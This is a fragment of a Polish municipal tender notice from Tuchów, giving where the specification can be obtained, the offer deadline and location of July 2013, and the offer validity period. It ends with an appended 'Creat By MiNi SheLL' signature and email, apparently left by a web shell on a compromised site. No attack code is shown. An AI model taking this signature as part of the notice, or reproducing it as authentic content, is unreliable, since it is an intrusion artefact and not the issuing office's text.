<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33-170 Tuchów ul. Jana Pawła II 4, pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 10:30, miejsce: Urząd Miejski w Tuchowie, 33-170 Tuchów ul. Rynek 1, Biuro Obsługi Klienta. Otwarcie ofert godz. 10.30, Ratusz sala konferencyjna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com